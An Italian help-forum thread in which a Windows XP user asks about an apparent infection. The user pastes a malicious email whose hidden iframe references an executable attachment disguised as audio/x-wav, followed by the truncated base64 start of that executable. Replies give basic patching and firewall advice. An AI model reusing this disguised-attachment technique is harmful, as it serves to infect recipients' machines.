ciao a tutti ieri è successa una cosa strana ho lasciato acceso tutto il giorno emule con win xp senza nessun firewall attivo ma solo con norton antivirus 2004 attivo. Quando sono arritavo a casa mi sono trovato una finestra dos con scritto impossibile eseguire l'operazione e sotto c: un file di nome bhdq.exe. Ho provato a cancellarlo ma niente da fare mi diceva ke era in uso da un altro programma. Successivamente sono riuscito a cancellarlo in modalità provvisoria e ho installato subito zone alarm. Ho fatto anke una scansione completa con norton aggiornatissimo ma non ho trovaro virus. Oggi ho ricevuto due e-mail strane di cui allego il testo:

Return-Path: <il.cipro@tiscali.it>
FROM: "Microsoft Network Mail Delivery Service" <smtpform@freemail.net>
TO: "Mail Client" <receiver@mxserver.com>
SUBJECT: Undelivered Mail: Returned To Sender
X-ID: 2335347195594778757148455
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="mgswiur"

--mgswiur
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD></HEAD>
<BODY>
<iframe src=3D"cid:ktoftxjduptdlk" height=3D0 width=3D0></iframe>
<BR><BR>Hi.
<BR>I'm afraid =
I wasn't able to deliver your message =
to the following addresses:<BR>
<BR><BR><BR>Undelivered message to <B>zuaiqx@freemail.net</B>
</BODY></HTML>

--mgswiur
Content-Type: audio/x-wav; name="bhdq.exe"
Content-Transfer-Encoding: base64
Content-Id: <ktoftxjduptdlk>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAB+i6hSOurGATrqxgE66sYBQfbKATvqxgG59sgBLerGAdL1zAEA6sYBWPXV
ASvqxgE66scBnurGAdL1zQEx6sYBguzAATvqxgFSaWNoOurGAQAAAAAAAAAAUEUAAEwBBABwy2E/
AAAAAAAAAADgAA8BCwEGAADQAAAAQAEAAAAAAIWuAAAAEAAAAOAAAAAAQAAAEAAAABAAAAQAAAAA
AAAABAAAAAAAAAAAIAIAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA
AABY6gAAtAAAAACwAQCoZwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAHACAAAAAAAAAAAAAAAAAAAAAAAA


qualcuno mi sa dire cosa è successo? posso stare tranquillo con il zone alarm attivo e dando a emule trusted zone? mi conviene formattare anke se spero non serva? grazie

ho dimenticato di dire ke allegato alle e-mail c'è il file ke ho nominato prima

probabilmente un lameronzolo è riuscito a forzare il tuo pc ed eseguire da remoto dei comandi. Consiglio:
- fare windows update al più presto;
- impostare delle password agli utenti che non siano troppo facili (se non nulle)
- avere un firewall che chiuda le porte usate da window (dall 135 alla 139 e la 445).

ok mi sa ke per sicurezza formatto. Ke danni può aver fatto questo c*****e sul mio pc? E se formatto può cercare ancora di entrare sul mio pc dato ke sa il mio ip? Come faccio a bloccare quelle porte sul zone alarm? Ma ke passwork intendi? per l'e-mail per internet? Scusa per le 3000 domande ma voglio capire bene cosa fare prima di procedere. Grazie

se installi le patch microsoft, dovresti essere abbastanza a posto.
Per le password intendo quelle degli utenti del pc.
Per le porte, se non erro, zone-alarm le dovrebbe già chiudere per default.

cmq per sicurezza preferisco formattare piccolo OT per emule basta ke mi copio tutta la cartella dopo aver formattato e mi conseva tutte le impostazioni? Se mi è stata fregata la password di connessione a alice c'è un modo per cambiarla o non si può? Cmq penso ke in teoria anke avendo quella password non servirebbe a niente perkè ho sentito dire ke adesso l'autenticazione è fatta sul numero di telefono e la password serve solo per l'e-mail

per emule sì.
per la password, non credo che te l'abbiano fregata e poi di certo non possono usarla per connettersi ad alice a tue spese, visto che la linea va attivata sul doppino telefonico.

Gohan mi sà ke ti erigerò una statua grazie mille delle informazioni certo ke mi piacerebbe proprio risalire a quello s****o ke mi ha attaccato il pc!

è difficile risalire a chi t'attacca; se hai un firewall che tiene il log dei tentativi d'intrusione è già qualcosa.

Penza che ad agosto c'è qualcuno che da un server di un'università spagnola si divertiva a piantarmi il router; poi ho aggiornato il firmware e non lo fa più.